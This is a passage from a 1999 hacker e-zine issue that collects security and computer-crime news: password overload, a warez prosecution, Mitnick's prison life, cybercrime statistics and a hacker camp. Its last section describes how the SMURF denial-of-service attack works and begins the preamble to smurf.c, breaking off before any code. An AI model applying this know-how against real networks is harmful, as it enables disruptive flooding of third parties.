He had forgotten his password. A sense of panic gripped him as he rapidly typed in variations on his favorite passwords. Two days later he gave up and rebuilt the system from scratch. Not everything can be recreated, though. Also lost in password purgatory is a year's worth of personal journal entries he kept in a Microsoft Word document on his personal computer. "I wanted the password to be different so that people wouldn't be able to get to my journal," McGuire said. "Unfortunately, neither can I." It is understandable that McGuire would drop a password or two. On a regular basis, he must remember three dozen passwords to gain access to computer networks, software programs, e-mail, voice mail, fax mail, Web sites, ATM's and even the security system for his house. Forgotten passwords are an inevitable consequence of the digitization of everything from money to mail. Twenty years ago, people had to remember only their Social Security number and maybe a phone number or two. But since the introduction of the automated teller machine, people have accumulated an arsenal of passwords, access codes and personal identification numbers to use everything from answering machines to office bathrooms. A result is lost computer files, inaccessible accounts and a lot of banged-up keyboards. "What is nightmarish is that we rely so much on information that comes from different sources," said Alessandro Piol, a managing director of Investco Private Capital in New York, who has been locked out of his e-mail account while conducting coast-to-coast venture capital negotiations. "If you are locked out of a system, it's like losing a limb." The exponential growth of Web sites creates an exponential growth in forgotten passwords. Almost all password-protected sites either encourage people who have forgotten their passwords to reregister or provide a mechanism where they can automatically retrieve their password. The New York Times on the Web site estimates that more than 1,000 people forget their password to the site each week, and 10 to 15 percent of its registrants are duplicates. Of course, many computer users simply do what computer security experts warn them not to: use the same password for everything. But even that strategy is becoming more difficult because various computer systems have different requirements for the rendering and length of the passwords. Ron Dilley is an extreme example of the password problem. Dilley, a network administrator for Applied Digital Access in the San Diego area, maintains 129 active passwords, 37 personal ones and 92 for work. He sees himself as the archetypal wired citizen of the future. "I suspect that we will be totally inundated with passwords of one form or another in the next 10 to 20 years and possessing 129 passwords will be the norm," he said. Dilley began to use a Palm organizer to track his passwords. Every few weeks, he forgets to take his Palm when he leaves home and makes a 50-minute round-trip back home to pick it up. Forgotten passwords cost millions of dollars annually in help-desk costs and lost productivity -- incidents like McGuire's rebuilding of the computer system from scratch. Industry estimates say 20 percent to 50 percent of all calls to company help desks are from people needing their passwords reset. According to the Gartner Group, an organization with 2,500 desktop computers can spend more than $850,000 a year resetting passwords. The requests for password help "are considered to be noise and nuisance by help-desk staff, because they are so highly repetitive," said John Jacobs, president of Network Support Technologies, a company in Burlington, Mass. that provides help-desk services. Forgotten passwords are a product of the computer's ability to store more information than the human brain can. "In the old days you just had to yell out, 'Zog, it's me,' and he would let you into the cave without clubbing you," said Prof. Irving Biederman, a cognitive neuroscientist at the University of Southern California. "Now you need all these passwords to get access anywhere." Research confirms the intuitive: the more we are asked to remember, the more likely we are to forget. The brain's capacity for remembering is indefinite as long it has associations for the memories. "The design of human memory and the design of computer architecture is at a crossroads," said Steve Pinker, a cognitive neuroscientist at the Massachusetts Institute of Technology. "A computer password must be arbitrary enough that people can't guess it, but human memory is designed to remember things that are not arbitrary." Whereas short-term memory usually holds between five and nine items, scientists say there are no limits on long-term memory capacity -- as long as people have associations for those memories. That is why people have a natural impulse to choose passwords based on familiar things -- children's birthdays, spouse's name, favorite sports team -- rather than incomprehensible strings like 3B#$Ir or 7*$3fg. According to Dr. Pinker, there is no neurological reason that given strong enough associations, people shouldn't be able to recall 129 passwords, "like you can remember an indefinite number of names of friends." A nuisance for computer users is also a growing expense for companies. The rampant growth of passwords has spawned various strategies for handling scattered bits of information. Some people keep lists of passwords taped to walls or to the underside of their keyboards, much to network administrators' dismay. Others keep lists in small notebooks or in files stored on their computers. Some high-security institutions like financial companies and hospitals assign passwords instead of letting users choose, or force users to change their passwords every 30 or 60 days, which results in periodic spikes in reset calls to technical support staffs. Resetting of passwords has become so costly to companies that some are choosing to automate the process. Password reset software eliminates the need for harried users to depend on help desks by allowing them to maintain their own user profiles. Merrill Lynch and Boeing both recently purchased such systems from the Courion Corporation. Michael J. Koszenski, a computer technician in Lexington, spent 2,000 hours of his own time creating a password database software for his PC after being disappointed with various password tracking programs. "It basically goes back to if you want something done right, you have to do it yourself," said Koszenski, who has 30 or so passwords and access codes to manage. For protecting his password program, there is yet another password that he keeps in his head. The proliferation of passwords and the propensity to lose them has helped fuel a cottage industry of companies and consultants who recover passwords using computer programs. While most password recovery requests come from people who are trying to retrieve passwords of dead relatives or disgruntled former employees, recovery businesses estimate that between 15 percent and 25 percent of requests come from people who have forgotten their own passwords on documents. Tax time is a popular time for people to forget passwords, particularly those on old financial files. So, too, are the holidays. "For about a week after New Year's people call up saying, 'I got drunk over the holidays, I changed my password on a whim and I can't remember it,"' said Amber Schroader, general manager of Access Data in Provo, Utah which sells about 600 password recovery software packages a month. Among the most common requests involve passwords for documents created with Microsoft Word or Excel, which are easy for the companies to recover because those programs do not have strong encryption. The majority of popular software applications produced in the United States and distributed internationally have intentionally weak encryption since this country has strict controls on the export of encryption tools and products, said Bob Weiss, president of Password Crackers, a Web-based password recovery consulting firm. "People are surprised by how many software products listed on our site are not secure," he said. There are some emerging high-tech solutions to the password deluge. Biometric devices that recognize fingerprints, faces and voices, and smart cards that are embedded with computer chips are gaining in popularity. Matchbox-size fingerprint recognition devices for the PC are now available for as low as $99. So-called smart cards, which carry digital signatures and are used for phone calls and purchases, are growing at a rate of 30 percent a year, predominantly in Europe. Piol, the venture capitalist, once taped a piece of paper listing his passwords on the wall by his desk, but a few months ago he started using a fingerprint scanner, U.are.U, to help manage the passwords. Impressed by the device, Piol tore down the paper and led a $9 million dollar venture capital investment in the company, Digital Persona. But until fingerprint scanners and smart card readers become as standard on desktops as computer mice, people will still have to struggle with the chore of password management. The University of Michigan is teaching its students a hygienic, low-tech approach to the problem. Treat passwords like underwear, the university says: Never let friends borrow them and never leave them lying about. And as anybody's mother would say, change them often. @HWA 47.0 A Former Network Administrator Faces Felony Charges in Hacker-Site Case ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://chronicle.com/cgi2-bin/printable.cgi A Former Network Administrator Faces Felony Charges in Hacker-Site Case By FLORENCE OLSEN A 25-year-old former computer-network administrator for the University of Oklahoma faces criminal charges under the state's Computer Crimes Act after allegedly using the university network to operate a site for hackers. which heavy use mysteriously disabled the campus network just as upperclassmen were arriving for the fall term. Authorities are investigating whether others were involved. The heavy usage had the effect of reducing the capacity of the campus backbone from "a 12-inch-diameter pipe to one no bigger than a stir straw," says Lieut. Jeffrey Harp, a public-safety officer at the university. At the time, university officials seized more than a half-dozen unauthorized Internet servers operating in two rooms assigned to residence-hall advisers in Walker Center, a 12-story dormitory on the university's campus, in Norman. The Daily Oklahoman reported that Mr. Breding is suspected of operating a "warez" site (pronounced "wares"), where members of the Internet underground copied and exchanged pirated commercial software after hackers had cracked the files' copyright-protection codes. Campus police say they seized one computer that the former network administrator allegedly had set up for a commercial purpose -- serving as host for others' Web pages. If convicted, Mr. Breding could be punished with up to a 10-year prison sentence and a fine of as much as $100,000. A hearing is set for August 17. University police spent 11 months and $20,000 on equipment, training, and consulting services to investigate the incident before turning the case over to the district attorney's office. "It was an eye-opening case for us," Mr. Harp says. "It taught us that we needed to get up to speed on investigating computer crime," he says, and in turn led department detectives to seek further training and certification as forensic computer investigators. "It was our first case like this, and we're trying to prepare ourselves for the next one." Mr. Breding was charged under the state's Computer Crimes Act, passed in 1984 and updated several times since. The act makes it a felony to knowingly or willfully exceed one's authorized use of computer-network resources or to disrupt those services to others. Tera Duke, the assistant district attorney, says it is the first such case filed under that statute in Cleveland County District Court, in Norman. Ms. Duke says she is unaware of any pending federal charges related to the case. @HWA 48.0 Happy Birthday Kevin ~~~~~~~~~~~~~~~~~~~~ From http://www.antionline.com/s Mitnick's Life - As It Stands Now Monday, August 2, 1999 at 1:20:04 by Kimberly Tracey - Writing For AntiOnline For a few years I was talking to Kevin almost every day and sometimes several times a day. Right now my work prevents me from being in touch with him every day, but I know people who are in contact with him, so I stay current. Here's a little bit about Kevin's life at MDC: At MDC there is no yard for exercising. They have no place to exercise outside where they can sit in the sun. Whenever the guards call a "lockup," the inmates are rounded-up and taken to a very large balcony outside. If you want to use a bathroom, you go to the one in your cell. When Kevin was sleeping on the floor, he had to use the toilets of other inmates. There are two TV's on Kevin's floor. The last time I heard, one TV was controlled by the blacks, and the other was controlled by the Hispanics. These two groups decide what everyone will watch. A white Jewish guy like Kevin doesn't have much of a say in the programming. There are vending machines on the floors, and there is at least one microwave oven. When the food is lousy, which is most of the time, inmates buy food from the guards or from someone in the kitchen and prepare meals and share them with each other. That is why Kevin accumulated cans of tuna and Pepsi a couple of years ago because these items are very important when you have nothing else to eat. And the tuna is that brown low-grade smelly stuff that I hate....no white albacore tuna at MDC! MDC brought in a couple of exercise bikes and they were broken almost immediately. I'm not sure what Kevin uses to exercise now. They may have gotten some new equipment. When he said he just finished a "workout," that could have been pushups, situps, and lifting some weights, if they have them. They might consider weights potential weapons, I don't know. Whenever any of us send Kevin money, it is put into his account and he is given a receipt telling him the amount. And unless they have changed the system, he doesn't know who sent him the money. And if you send him a personal check or a money order from the bank, the money is held up for weeks before it is placed into his account. If you send him a money order which you can buy from the Post Office, that money is placed into his account immediately. Therefore, if you are near the Post Office and want to help Kevin, pickup a Postal Money Order and send it to him with a note telling him that you included a MO for $10 or whatever the amount was. Then regardless of whether MDC informs him where the money came from, he will know directly from you what was sent, and he will appreciate it very much. Whatever money Kevin receives is spent on stamps, envelopes, paper, shaving and bath items like soap and toothpaste, vitamins, tennis shoes, plain white Hanes t-shirts, etc. When Kevin makes calls, he goes to one of the three phones on the floor and leans against the wall as he places his collect calls. He is only allowed to call collect, and Pac Bell charges around $2.00 for every call accepted by the party he is calling plus the minute rate. Each call is limited to 20 minutes. The computerized operator breaks in at 19 minutes and tells you that there is one minute remaining, and then 15 seconds and you are cut off exactly at the 20 min point. If Kevin is lucky, he finds a stool he can sit on while he is talking. Usually, each morning inmates signup for phone time. If you have a few extra dollars, you are able to buy someone's phone time. MDC doesn't like this practice, but they all do it and most of the time the guards leave you alone. On this floor where Kevin resides, phones are shut off at 9:45 p.m. They are turned back on around 7 or 8 a.m. During the day inmates roam around in one big "general area." Many play cards. There is at least one ping-pong table because you can hear the ball being hit back and forth in the background. Inmates can signup for library time. Kevin is still being allowed to work on his computer during the day, no weekends. Kevin and others can buy cheap Sony Walkmans from the prison commissary. They can play the radios, but they are not allowed CD or tape players. Kevin's attorney, Donald Randolph, can bring these items to the "attorney room" and Kevin can listen to tapes and view a video if he is with his attorney. So don't send Kevin tapes or CD's unless you send them directly to his attorney. And then they may never reach Kevin because he is working on his case when his defense team visits him. Pretty grim, right? Your letters, cards, jokes, magazines, and different items you send Kevin break the monotonous schedule he faces every day. He may not have the time to write back to every person who writes to him, but he reads everything and tells his friends and family how much the news from the outside world means to him. And Kerry and Emmanuel and the rest of the people who hear from Kevin will tell you that he appreciates the support from this mailing list and those who visit his site and inform the world about him and his case. BTW: Kevin's BirthDay is August 6th. If you would like to send him a card or gift, you can mail it to: Kevin Mitnick 89950-012 P.O. Box 1500 Los Angeles, CA 90053 @HWA 49.0 Cybercrime up 43% ~~~~~~~~~~~~~~~~~~ http://www.zdnet.com/filters/printerfriendly/0,6061,2310082-2,00.html -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Study: Cybercrime cases up 43 percent By Kevin Poulsen, ZDNN August 5, 1999 3:54 PM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2310082,00.html?chkpt=hpqs014 Federal law enforcement agencies referred a record number of computer crime cases for prosecution last year, but most of them were rejected by government attorneys, according to a legal journal report released Wednesday. The report, authored by attorney and electronic privacy advocate David Banisar, and based on data obtained under the Freedom of Information Act by the Transactional Records Access Clearinghouse, appears in this week's Criminal Justice Weekly. It's believed to be the first independent analysis of the government's war on computer crime. In all, investigators from the FBI and other agencies offered 419 computer crime cases to federal prosecutors in 1998, up 43 percent from 1997, and more than three times as many as in 1992. At the same time, prosecutors filed charges in only 83 cases. That ratio of referrals to prosecutions, approximately 5 to 1, is significantly lower than the overall rate for federal prosecutions in all categories. In 1998, Banisar said, there were 132,772 referrals at the federal level, and 82,071 prosecutions, or about one prosecution for every 1.6 referrals. FBI: Hard to prove "Computer crime is terribly hard to prove," says FBI spokesperson Debbie Weierman. "Every one is handled on a case by case basis, and I can't give you a general reason for the difference in figures." According to the report, each year between 1992 and 1998, the Department of Justice has declined to prosecute between 64 percent and 78 percent of the cases brought to them. Forty percent of the rejected cases cited lack of evidence of criminal intent, weak or insufficient admissible evidence, or no evident federal offense. Another 15 percent were referred to state authorities for prosecution. The remaining cases may be outstanding, or reclassified under another category. A former assistant United States attorney said he is not surprised by the results, and that in many ways computer crime cases are unique. "There are serious evidentiary questions and jurisdictional questions in these cases," says Mark Rasch, a former computer crime prosecutor, now working as a computer security consultant for Global Integrity, based in Virginia. "Law enforcement may be presenting you with a perfectly good case, against a defendant in Kuala Lumpur." Moreover, he said, "Juveniles are frequently the ones that get caught. So while the FBI may be able to put together a perfectly cohesive case against a juvenile, that's the kind of case that may be declined by the United States Attorney's office by their discretion." Unique challenges Justice officials hadn't reviewed the statistics, but agreed that there are unique challenges to prosecuting computer crime. In 1998, the average sentence for those convicted was five months, with over half of the defendants receiving no jail time. Since 1992, 196 people have been convicted and 84 imprisoned in cases classified as federal computer crimes. Only 57 cases reached disposition last year, 47 ending in convictions, primarily in plea agreements, and 10 ending with the status of "not successful" -- a category that includes dismissals and not-guilty verdicts. Of the cases that ended in 1998, the FBI initiated the most, with 21 convictions, and eight unsuccessful prosecutions. The Secret Service, Treasury Department and IRS claim the remaining 28 convictions and two failed prosecutions, says Banisar, a columnist for the legal journal, and co-author of The Electronic Privacy Papers. Because referrals can take years to become prosecutions, direct correlation from year to year is a tricky matter, Banisar cautioned. But he said the overall statistics are telling. "For an issue that the federal government is making such a major deal out of, trying to stop computer crime and information warfare, there's remarkably few prosecutions," he said. Kevin Poulsen writes a weekly column for ZDTV's CyberCrime. @HWA 50.0 Canada Can't Keep Up With CyberCrime ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond An intelligence brief prepared by the RCMP says that the Canadian police lack the necessary skills and personnel to protect the nations infrastructure from infocriminals and cyber terrorists. Ottawa Citizen http://www.ottawacitizen.com/national/990805/2686261.html Police can't handle cyber threats: RCMP report Mounties say Canada is 'lagging behind' in creation of hacker-defence systems Jim Bronskill The Ottawa Citizen The RCMP say Canadian police lack the necessary skills and personnel to meet the growing threat to national security from computer hackers. Canada is "lagging behind" other advanced countries in building defences to protect communication, power, water and banking systems, warns an intelligence brief prepared by the force in mid-June. "There is a general lack of awareness about the nature and level of threat posed to national security by cyber attacks and the level of defence and response that would be required," says the brief, obtained under the Access to Information Act. "Several government departments dealing with an increasing number of sophisticated attacks are seeking guidance, support and assistance from law enforcement, only to find there is a lack of skilled and trained resources." The assessment is the latest in a string of warnings sounded by Canadian security agencies about the vulnerability of the country's information networks. A special Senate committee and the Canadian Security Intelligence Service have also underscored the threat to digital networks and data banks from hackers, electronic spies and cyber-terrorists. The RCMP noted an increase during the last year in the number of computer breakins, data thefts and system disruptions, a trend that does not bode well. "The likelihood of a serious, deliberate and targeted attack to a Canadian critical-infrastructure system has increased from low to medium, and the impact of such an attack remains high," says the RCMP brief. "In the last five years, the capability to intrude into systems has increased dramatically as the cost of technology has plummeted." On the Internet, there are Web sites, electronic bulletin board services and chat rooms dedicated to discussing and trading hacking tools and methods. A group known as H4G1S claimed responsibility for breaking into and altering 13 major U.S. and Canadian corporate Web sites in April, notes the RCMP document. A more serious attack could have the cascading effect of the January 1998 ice storm that denied electrical power to parts of Eastern Canada. The brief's worrisome tone does not surprise Andrew Mackie, director of Manitoba's fledgling information protection centre. "We are way behind the other countries," he insisted. Mr. Mackie said the United States, Australia, Britain and other European countries have moved more quickly than Canada to set up national centres to detect and prevent attacks. "We don't even have a plan right now. We're just working on it." RCMP Sgt. Andre Guertin said the force sees a rising threat to Canadian systems in the immediate future because of the heightened potential for sabotage due to the millennium computer bug. The force has established Project Solstice to ensure governments and businesses are aware that terrorists could take advantage of the computer glitch. For instance, a company might be tempted to waive security screening in the rush to hire a repair crew to make systems Y2K compliant. The RCMP have been assisting the U.S. Federal Bureau of Investigation on computer-crime cases, but the memo notes "difficulties encountered with Canadian collaboration and investigative support" in international probes, raising issues of co-ordination, resources and sovereignty. Mr. Guertin said some of these questions were broached when U.S. and Canadian officials met in Charlottetown in June to discuss cross-border crime. @HWA 51.0 Germans hold bank liable for using 56 bit encryption. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond A German court recently decided to hold a bank liable for losses in connection with a stolen Eurocheque card in part because the 56-bit encryption protecting the card was considered "out-of-date and not safe enough." Are you still relying on DES to keep your data secure? Asian Technology Information Program - Paragraph 13 http://www.atip.or.jp/public/atip.reports.98/atip98.096.html 52.0 GPS Date Rollover on Aug 22 ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by ph1b3r_m0nk On Aug. 22nd the GPS (Global Positioning System) Rollover is scheduled to occur. This rollover happens every 1,024 weeks but this will be the first rollover since the system went online on Jan. 6th 1980. On Aug. 22nd the date counter will return to zero to begin the count for the next 1,024 weeks. GPS is utilized within many industries such as Satellite tracking, Defense Information, Navigation and Geographic Information Systems (GIS). Some early GPS units did not take this date rollover into account and may be affected. (hhhmmmm, I suppose we ought to postpone that hiking trip.) National Park Service http://www.nps.gov/pub_aff/features/gps_alert.htm Wired http://www.wired.com/news/news/technology/story/21098.html Navstar GPS Joint Program Office http://gps.laafb.af.mil 53.0 NY Police Face Possible Copyright Violations ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Space Rogue The New York State Police has turned to the web in an effort to track down the alleged vandals who destroyed the Woodstock '99 site. The Police posted 10 photographs of the mayhem that had been taken by the Associated Press and asked the public to help identify people in the photos. The AP requested the photos be removed as soon as they knew about it. Nando Times http://www.nandotimes.com/technology/story/body/0,1634,77278-122111-861061-0,00.html Civic.com http://www.civic.com/news/1999/august/civ-woodstock-8-4-99.html New York State Police Web Site http://www.troopers.state.ny.us/ New York police turn to Web for help in Woodstock crimes Copyright © 1999 Nando Media Copyright © 1999 Associated Press By JOHN KEKIS ROME, N.Y. (August 3, 1999 12:00 a.m. EDT http://www.nandotimes.com) - New York State Police are turning to the Internet in an attempt to track down thieves and vandals who trashed the Woodstock '99 site. But their use of news photos without permission has raised other legal issues. The State Police posted 14 photographs on its Web site, including 10 shot by Associated Press photographers. The AP protested as soon as it learned of the unauthorized use. The photos show concertgoers breaking into pay phones, tearing down a 3-mile-long "Peace Wall," looting a vendor's truck and robbing an automated teller machine. The police ask the public for any additional photos and details of the identities of people shown. Sam Boyle, chief of the AP's New York City Bureau, discussed the site with various officials on Monday. "We have two concerns - violation of copyright and the journalistic separation from law enforcement," Boyle said. The AP photos were put on the state police Web page on Friday, according to M.J. Edelman, Web master for the state police. Monday morning, Lt. Jamie Mills of the public information office said the pictures would be taken off the site. Boyle then received calls from higher officials asking for permission to keep the pictures up, which he said could not be granted. Glenn Valle, chief counsel for the state police, said his review indicated that there may not be an issue of copyright infringement. "We don't think that we're violating the copyright or infringing on the copyright in this manner," Valle said. "It was material that was already published." @HWA 54.0 Chaos Computer Club: Happy Hacker Campers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Geekstock: German Hackfest ~~~~~~~~~~~~~~~~~~~~~~~~~~ Wired News Report 3:00 a.m. 30.Jul.99.PDT It's Internet World meets the Rainbow Gathering next week when geeks from around the world gather for a three-day camp out near Berlin. Sponsored by German hacker group Chaos Computer Club (CCC), the event pits campers against each other in periodic hacking contests and gives proto-geeks a chance to see the light of day. Pre-registration is already closed for the event, which will take place 6 to 8 August in Altlandsberg, near Berlin. However, according to the CCC site, those who want to show up at the event with DM150 (US$82) may slip under the 2,000-people limit. The camp will be divided into theme villages, Burning Man style. Participants can choose the village that most represents their talents and interests, from lock-picking to re-engineering to cryptography. Intermittent events like the Linux Deathmatch, a competition in which one team tries to hack another's network, will liven up bouts of partying, workshopping, and drinking at the CCC Leisure Lounge, and swimming on the nearby lake. The CCC will provide electricity and an Ethernet for every tent. Campers are encouraged to bring their own computer equipment and can hook up to the specially created CAMPnet network or the Internet in their tents or in the CCC hackcenter. The grassroots event discourages press and commercial attendance. Business visitors -- defined in the FAQ as those who are "rich or working for a company or government that wants you at the Camp because there is a lot to learn or you have a certain commercial interest" -- are asked to pay an increased ticket price of DM1,500 (US$800). Hackers Happy Campers ~~~~~~~~~~~~~~~~~~~~~ by Steve Kettmann 3:00 a.m. 7.Aug.99.PDT BERLIN -- It takes countless hours cooped up indoors in front of a computer screen to truly appreciate the giddy mood at this weekend's three-day Chaos Communication Camp. By Friday evening, more than 1,400 hackers, encryptologists, computer visionaries, and assorted geeks had pitched their tents in a scenic lakeside field, and more were on their way. An afternoon of workshops gave way to a warm evening of lounging in front of tents, as people pounded away at keyboards and greeted acquaintances they had met only via networks or email. "It's a way to attach faces to email addresses," said John Gilmore, one of the founders of the San Francisco-based Cypherpunks. "It's a way to say, 'Hey, I know this person, we've been collaborating for years. Who are you?'" Like others at the event, Gilmore was headed in about four directions at once. That's how it goes when you put together thousands of smart, passionate people used to the isolated pursuit of their craft. Mass hacking, under the stars no less, was one of the activities. It took on an unlikely charm, especially given its location -- in the main tent next to a small, polished-silver spacecraft, a "shuttle" to Chaos' Heart of Gold Web site. This weekend's three-day event, the first of its kind in Germany, takes as its inspiration Hacking in Progress, a similarly organized hacking and technology festival that took place outside of Amsterdam two summers ago. "About 10 Cypherpunks went to HIP two years ago, and they came back with so many stories about how fun it was hanging out with people there. Also, they finished proofreading and typing in PGP, Pretty Good Privacy, a computer program that does encryption, so there was an international version," said Gilmore. "I didn't make it to HIP, but I resolved to go to the next one, and here I am. We have 15 or 20 people here, probably more than a dozen from the San Francisco Bay Area, and others scattered around from Berlin and Amsterdam and other parts of Europe. It's a real collegial, friendly sort of atmosphere. I'm meeting a lot of great people." The Berlin-based Chaos Computer Club, which organized the weekend, spent a year preparing for the meeting. That comes through in the atmosphere of crisp organization that seems to meld seamlessly with a spirit of fun -- the latter best summed up by comments like, "What's it like? I've never done pot before." "For me, this is more German than HIP," said Ine Poppe, a Dutch documentary filmmaker and artist who worked HIP as a journalist. "It's better organized. They learned a lot from the festivals before. "From my point of view, HIP had more of a scene of chaos: tents close together and cables all over the place and dance parties into the night. Maybe we will have those later." Kurt Seifried, a 22-year-old from Edmonton, Alberta, was roaming around the Cypherpunk tent with the exultant air of a student wrapping up finals week. "I gave a talk during one of the workshops and they didn't throw beer cans at me, so I guess it went all right," he said. "It was my first public speaking experience, so it was kind of scary. "The worst part was, they canceled the other workshop scheduled for the same time, so I looked up and about 100 people were streaming into the tent wanting to be entertained. It was like something out of Pink Floyd's The Wall." Seifried's area of expertise is security, the yin to cracking's yang. His 177-page guide to Linux security is posted on the Web. "It's encryption at network level to secure things, because right now the Internet is wide open, as people know. I came here to do that, and to network a little," he said. Yet after the hacking and networking comes the relaxing, and the face-to-face conversations. @HWA 55.0 Hackers and Cyberwar "The Threat of Chaos " ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Hacker Sitings and News 8/7/99 Cyberwar: The Threat of Chaos Hackers can disrupt, but can they make war? Hackers and other cyber-vandals have become a major threat as the world's powers rely increasingly on their computers. By Bob Sullivan MSNBC “WE HAVE NOTHING to fear but fear itself,” offered Franklin Roosevelt during the throes of the Great Depression. He might also have been talking about the Information Age, where the power of personal computers seems to offer limitless possibilities for both creativity and destruction. Not true, the experts say — there are limits to the damage that can be done with zeros and ones. Experts like those at Bell Laboratories in New Jersey insist that image of a pimply-faced geek gaining control of Defense Department computers is pure science fiction. Even an organized “hack” by well-funded terrorist organizations who take control of a nuclear missile facility is fanciful, they say — and hardly worth the trouble. Not when it would be so much easier to create equal havoc using much simpler methods. THINKING SMALL ‘We are the most technologically advanced country in the world, which means we have the most to lose.’ — FRANK CILLUFFO Information warfare specialist Imagine, for example, if the Internet suddenly stopped working. A hacker group told Congress it could be done in half an hour. Or if power to major cities were disrupted. Government-hired hackers did that in four days in 1997. Or if parts of the 911 system were cut off. A Swedish hacker now in an asylum managed briefly to cut off 911 service in Florida two years ago. Such “nuisance” hacks on infrastructure are less dramatic than the hijacking of a missile, but they might be more effective. “The psychological impacts of IW (information warfare) can’t be overstated,” said Frank Cilluffo, director of the Information Warfare Task Force at the Center for Strategic and International Studies. “Using it, terrorist groups can achieve what they cannot militarily. “We are the most technologically advanced country in the world, which means we have the most to lose,” he added. “The United States is not very prepared to lose power, for example. And how long can you live without that database? What if suddenly all e-commerce were cut off?” TARGETING FINANCE Throw banking into that e-commerce category. During the Kosovo conflict, numerous reports suggested U.S. intelligence agencies had hired hackers to tinker with international bank accounts full of Yugoslav President Slobodan Milosevic’s money. There was plenty of debate in the security community about how possible this might be, but even the idea sent shudders through the financial industry. Once that Pandora’s box is open — once one government’s hackers are capable of freezing or altering personal bank account information — other governments and terrorist organizations surely would follow suit. And since the entire banking system is based on confidence, such an attack could completely undermine the integrity of the banking system, according to Kawika Daguio, executive vice president of the Financial Information Protection Association. THE MULTIPLIER EFFECT Cilluffo’s biggest concern is not an all-digital attack, but the use of computers as a multiplier for a more traditional attack. Imagine if a hacker had disabled 911 during the Oklahoma City bombing in 1995. Not only would medical help have been severely delayed, leading to more death and destruction — the resulting confusion would at least be demoralizing and, at worst, create a panic. For proof of the potential for mob psychology, experts point to the Y2K bug. Even with several years’ warning and continuous announcements that computers are Y2K-compliant, banks report cash hoarding has already begun, and survivalist-minded individuals are squirreling away water and dry goods. “The actual problem is usually 10 times less damaging than the public perception of it,” said Space Rogue, who runs the Hacker News Network service. The threat: real or not? There’s plenty of debate about how severe the cyberthreat is, though recent signals from the U.S. government suggest federal agencies are taking it very seriously. Just last week, The New York Times was leaked a document showing the National Security Council is working on a Big Brother-like electronic monitoring system called the “Federal Intrusion Detection Network.” The plan’s director told the Times: “We know” foreign governments are developing cyberwar capabilities, and “we have good reason to believe that terrorists may be developing similar capabilities.” ELIGIBLE RECEIVER The National Security Agency’s 1997 cyberwar “fire drill” may have inspired the study. In a military exercise code-named “Eligible Receiver,” 35 hackers hired by the NSA gained access to 36 of the 40,000 government networks within four days. They were able to gain control of major power grids and could have disrupted power in Los Angeles, Chicago, Washington and New York. But nothing nearly so sophisticated is required. In testimony to Congress last year, members of the hacker group L0pht said they could bring the Internet to its knees in less than an hour. “It is not difficult at all to fool, confuse or corrupt major [domain name] servers,” Dr. Mudge, who testified to Congress, told MSNBC. “There are many more interesting attacks that could be much more devastating, dealing with disrupting routing between major tier-one service providers (that is, stopping MCI from being able to talk to Sprintnet, etc.) and is completely feasible, doable with very little effort.” And the number of technologies that might be turned against the United States continues to expand with each high-tech invention, say several scientists at U.S. high-tech labs. Among the most frightening are the advent of MEMS — micro-electro-mechanical systems. These tiny machines, potentially smaller than a human cell, may one day be injected into the bloodstream as miniature doctors sent to beat back viruses or kill cancerous cells. But they could just as easily be designed as a lethal combination of high-tech and biological warfare, as smart MEMS could be set to infect and kill specific kinds of subjects. Irrational fears? Not everyone is persuaded the threat is all that dramatic. After all, hackers did not gain access to the Pentagon’s most secure systems. InfoWar.com founder Louis Cipher (a pseudonym) says Eligible Receiver and other high-profile cyber-threat incidents are part publicity stunt aimed at getting more federal money targeted to cyberwarfare research. “Paranoia is a bad thing, and America is being infected quickly,” Cipher said. “Everybody’s an alarmist.... You can disturb an infrastructure. Can go into telephony and can cause disturbance, a denial of service. But disturbing electrical facilities is difficult. Just like on a railroad, they can go from track to track. There are a lot of safeguards.” And despite all the conjecture about cyberwar capabilities, there’s little evidence it has actually been used. In fact, even if the ability to take out power grids with a computer is out there, U.S. forces apparently showed a distinct reluctance to use the ability during the Kosovo conflict. So-called “soft bombs,” which short out electric lines, were used to create local power disruptions instead of a computer-based attack. That satisfies Cilluffo, who thinks the United States should hold off crossing the line to cyberwar for as long as possible. “A well-placed bomb may still be easier,” Cilluffo said. “If we can go through physical means, then we are not compromising a technique that could be used against us.... After all, we have a lot more to lose.” Bob Sullivan covers Internet issues for MSNBC.com @HWA 56.0 LOCKDOWN 2000 ~~~~~~~~~~~~~ From http://www.net-security.org/ by BHZ, Saturday 7th August 1999 on 4:50 pm CET New version of Lockdown 2000 has been released - Lockdown 2000 3.0.1.31. In this version some bugs are repaired (this build fixes all error messages that some Windows 95/98 users had on close and shutdown, fixes the manual scanner bug and many more new trojan signatures are added - the current number of trojan versions which it detects is 301). More information on the website (www.lockdown2000.com). @HWA 57.0 The SMURF attack and smurf amplifiers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contrary to popular belief SMURF attacks are still very much in use and a threat to ISPs as well as users alike. The reason for this is that no matter how much you yell certain badly maintained networks STILL continue to act as SMURF AMPLIFIERS. A plain smurf basically ellicits a ping response from several hundred machines with a spoofed address and a target return address, a SMURF AMPLIFIER responds more than once to the ping, in some cases several (as many as 10 or more ) times. These nets are targetted by the smurfer for their use against the target site... heres a brief description of smurfs and a list of networks that are acting as smurf amplifiers as of this writing with urls on where to go to find current stats. - Ed SMURF.C by TFreak Well, I suppose its `safe' to release this, it seems everyone and their dog has it and apparantly (and to my surprise) it still works. The `smurf' attack is quite simple. It has a list of broadcast addresses which it stores into an array, and sends a spoofed icmp echo request to each of those addresses in series and starts again. The result is a devistating attack upon the spoofed ip with, depending on the amount of broadcast addresses used, many, many computers responding to the echo request. Before I continue may I first say that this code was a mistake. When it was written I was not aware of the fact that a) the world would get its hands on 